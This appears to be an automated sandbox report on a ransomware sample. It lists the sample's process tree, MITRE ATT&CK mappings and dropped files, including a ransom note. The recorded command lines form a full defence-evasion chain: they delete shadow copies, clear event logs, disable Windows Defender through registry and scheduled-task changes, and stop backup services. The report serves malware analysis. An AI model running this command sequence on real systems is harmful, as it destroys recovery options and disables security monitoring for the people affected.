\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1736 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1936 powershell.exe 2904 powershell.exe 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 2616 wevtutil.exe Token: SeBackupPrivilege 2616 wevtutil.exe Token: SeSecurityPrivilege 776 wevtutil.exe Token: SeBackupPrivilege 776 wevtutil.exe Token: SeSecurityPrivilege 1984 wevtutil.exe Token: SeBackupPrivilege 1984 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1852 wmic.exe Token: SeSecurityPrivilege 1852 wmic.exe Token: SeTakeOwnershipPrivilege 1852 wmic.exe Token: SeLoadDriverPrivilege 1852 wmic.exe Token: SeSystemProfilePrivilege 1852 wmic.exe Token: SeSystemtimePrivilege 1852 wmic.exe Token: SeProfSingleProcessPrivilege 1852 wmic.exe Token: SeIncBasePriorityPrivilege 1852 wmic.exe Token: SeCreatePagefilePrivilege 1852 wmic.exe Token: SeBackupPrivilege 1852 wmic.exe Token: SeRestorePrivilege 1852 wmic.exe Token: SeShutdownPrivilege 1852 wmic.exe Token: SeDebugPrivilege 1852 wmic.exe Token: SeSystemEnvironmentPrivilege 1852 wmic.exe Token: SeRemoteShutdownPrivilege 1852 wmic.exe Token: SeUndockPrivilege 1852 wmic.exe Token: SeManageVolumePrivilege 1852 wmic.exe Token: 33 1852 wmic.exe Token: 34 1852 wmic.exe Token: 35 1852 wmic.exe Token: SeIncreaseQuotaPrivilege 1660 wmic.exe Token: SeSecurityPrivilege 1660 wmic.exe Token: SeTakeOwnershipPrivilege 1660 wmic.exe Token: SeLoadDriverPrivilege 1660 wmic.exe Token: SeSystemProfilePrivilege 1660 wmic.exe Token: SeSystemtimePrivilege 1660 wmic.exe Token: SeProfSingleProcessPrivilege 1660 wmic.exe Token: SeIncBasePriorityPrivilege 1660 wmic.exe Token: SeCreatePagefilePrivilege 1660 wmic.exe Token: SeBackupPrivilege 1660 wmic.exe Token: SeRestorePrivilege 1660 wmic.exe Token: SeShutdownPrivilege 1660 wmic.exe Token: SeDebugPrivilege 1660 wmic.exe Token: SeSystemEnvironmentPrivilege 1660 wmic.exe Token: SeRemoteShutdownPrivilege 1660 wmic.exe Token: SeUndockPrivilege 1660 wmic.exe Token: SeManageVolumePrivilege 1660 wmic.exe Token: 33 1660 wmic.exe Token: 34 1660 wmic.exe Token: 35 1660 wmic.exe Token: SeIncreaseQuotaPrivilege 1660 wmic.exe Token: SeSecurityPrivilege 1660 wmic.exe Token: SeTakeOwnershipPrivilege 1660 wmic.exe Token: SeLoadDriverPrivilege 1660 wmic.exe Token: SeSystemProfilePrivilege 1660 wmic.exe Token: SeSystemtimePrivilege 1660 wmic.exe Token: SeProfSingleProcessPrivilege 1660 wmic.exe Token: SeIncBasePriorityPrivilege 1660 wmic.exe Token: SeCreatePagefilePrivilege 1660 wmic.exe Token: SeBackupPrivilege 1660 wmic.exe Token: SeRestorePrivilege 1660 wmic.exe Token: SeShutdownPrivilege 1660 wmic.exe Token: SeDebugPrivilege 1660 wmic.exe Token: SeSystemEnvironmentPrivilege 1660 wmic.exe Token: SeRemoteShutdownPrivilege 1660 wmic.exe Token: SeUndockPrivilege 1660 wmic.exe Token: SeManageVolumePrivilege 1660 wmic.exe Token: 33 1660 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2412 wrote to memory of 1940 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 31 PID 2412 wrote to memory of 1940 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 31 PID 2412 wrote to memory of 1940 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 31 PID 2412 wrote to memory of 1940 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 31 PID 1940 wrote to memory of 2652 1940 net.exe 33 PID 1940 wrote to memory of 2652 1940 net.exe 33 PID 1940 wrote to memory of 2652 1940 net.exe 33 PID 1940 wrote to memory of 2652 1940 net.exe 33 PID 2412 wrote to memory of 2180 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 34 PID 2412 wrote to memory of 2180 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 34 PID 2412 wrote to memory of 2180 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 34 PID 2412 wrote to memory of 2180 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 34 PID 2180 wrote to memory of 2284 2180 net.exe 36 PID 2180 wrote to memory of 2284 2180 net.exe 36 PID 2180 wrote to memory of 2284 2180 net.exe 36 PID 2180 wrote to memory of 2284 2180 net.exe 36 PID 2412 wrote to memory of 2560 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 37 PID 2412 wrote to memory of 2560 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 37 PID 2412 wrote to memory of 2560 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 37 PID 2412 wrote to memory of 2560 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 37 PID 2560 wrote to memory of 2272 2560 net.exe 39 PID 2560 wrote to memory of 2272 2560 net.exe 39 PID 2560 wrote to memory of 2272 2560 net.exe 39 PID 2560 wrote to memory of 2272 2560 net.exe 39 PID 2412 wrote to memory of 2540 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 40 PID 2412 wrote to memory of 2540 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 40 PID 2412 wrote to memory of 2540 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 40 PID 2412 wrote to memory of 2540 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 40 PID 2540 wrote to memory of 2072 2540 net.exe 42 PID 2540 wrote to memory of 2072 2540 net.exe 42 PID 2540 wrote to memory of 2072 2540 net.exe 42 PID 2540 wrote to memory of 2072 2540 net.exe 42 PID 2412 wrote to memory of 2844 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 43 PID 2412 wrote to memory of 2844 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 43 PID 2412 wrote to memory of 2844 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 43 PID 2412 wrote to memory of 2844 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 43 PID 2844 wrote to memory of 2896 2844 net.exe 45 PID 2844 wrote to memory of 2896 2844 net.exe 45 PID 2844 wrote to memory of 2896 2844 net.exe 45 PID 2844 wrote to memory of 2896 2844 net.exe 45 PID 2412 wrote to memory of 2908 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 46 PID 2412 wrote to memory of 2908 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 46 PID 2412 wrote to memory of 2908 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 46 PID 2412 wrote to memory of 2908 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 46 PID 2908 wrote to memory of 2888 2908 net.exe 48 PID 2908 wrote to memory of 2888 2908 net.exe 48 PID 2908 wrote to memory of 2888 2908 net.exe 48 PID 2908 wrote to memory of 2888 2908 net.exe 48 PID 2412 wrote to memory of 2856 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 49 PID 2412 wrote to memory of 2856 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 49 PID 2412 wrote to memory of 2856 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 49 PID 2412 wrote to memory of 2856 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 49 PID 2856 wrote to memory of 2832 2856 net.exe 51 PID 2856 wrote to memory of 2832 2856 net.exe 51 PID 2856 wrote to memory of 2832 2856 net.exe 51 PID 2856 wrote to memory of 2832 2856 net.exe 51 PID 2412 wrote to memory of 2312 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 52 PID 2412 wrote to memory of 2312 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 52 PID 2412 wrote to memory of 2312 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 52 PID 2412 wrote to memory of 2312 2412 2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe 52 PID 2312 wrote to memory of 2816 2312 net.exe 54 PID 2312 wrote to memory of 2816 2312 net.exe 54 PID 2312 wrote to memory of 2816 2312 net.exe 54 PID 2312 wrote to memory of 2816 2312 net.exe 54 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-12_78fb5aaf33ba7bc649c3896f0be1c94b_frostygoop_hive_sliver_snatch.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Windows\SysWOW64\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1940 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵
- System Location Discovery: System Language Discovery
PID:2652
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵
- System Location Discovery: System Language Discovery
PID:2284
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2560 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵
- System Location Discovery: System Language Discovery
PID:2272
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2540 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵
- System Location Discovery: System Language Discovery
PID:2072
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵
- System Location Discovery: System Language Discovery
PID:2896
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵
- System Location Discovery: System Language Discovery
PID:2888
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵
- System Location Discovery: System Language Discovery
PID:2832
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵
- System Location Discovery: System Language Discovery
PID:2816
-
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2956
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3016
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2964
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2952
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2812
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2712
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2768
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:2740
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1980
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:3048
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- System Location Discovery: System Language Discovery
PID:2940
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2588
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:1704
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1396
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:1084
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:2244
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:620
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
- System Location Discovery: System Language Discovery
PID:752
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2208
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵
- System Location Discovery: System Language Discovery
PID:2132
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:2120
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:1952
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵
- System Location Discovery: System Language Discovery
PID:332
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1644
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:1304
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:468
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵
- System Location Discovery: System Language Discovery
PID:2008
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1992
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵
- System Location Discovery: System Language Discovery
PID:1068
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵
- System Location Discovery: System Language Discovery
PID:2060
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1484
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1608
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- System Location Discovery: System Language Discovery
PID:1492
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1800
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1628
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:1968
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:352
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
- System Location Discovery: System Language Discovery
PID:888
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies Security services
- System Location Discovery: System Language Discovery
PID:712
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- System Location Discovery: System Language Discovery
- Interacts with shadow copies
PID:1736
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2616
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1984
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵
- System Location Discovery: System Language Discovery
PID:1556 -
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2416
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:1724
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1936
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵
- System Location Discovery: System Language Discovery
PID:2840 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2904
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1System Services
1Service Execution
1Windows Management Instrumentation
1Defense Evasion
Direct Volume Access
1Impair Defenses
4Disable or Modify Tools
2Indicator Removal
3Clear Windows Event Logs
1File Deletion
2Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\pK8K_HOW_TO_DECRYPT.txt
Filesize1KB
MD59a85ef171a3182928e879bda7d95fd5c
SHA1a6d05725bfd9cbbdaaf00e852db758f8079b7b61
SHA2560139e27268b1e24ffa81147d9e8660f6eec2b162ab930a45469dccbc1ff31024
SHA5125b4042e90b5d802e89d6073e7a2fd0994c854af86d0bbd5c40f36b4162217a83aa9a1142ccb4cface094e63f26ba7f8d6bec3870bca8a6587b1d72e4394eaa58
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD559a7a8a5ca107eed855da932ea6d9efd
SHA14e52a940053ff0a3ca37c0ae75097e8fe2ec2365
SHA2567de66f82e8ac3110d4ee7136d5ae0c711c21b2f8106d90b373c1887b77ea3994
SHA5123c2a5a6007e00171288d0e947ed1176935601f60ca727dc99302989f5cb336b95269284a798b37701e1d970953ef5c14ec48dc7b8b47827380805c82871e3924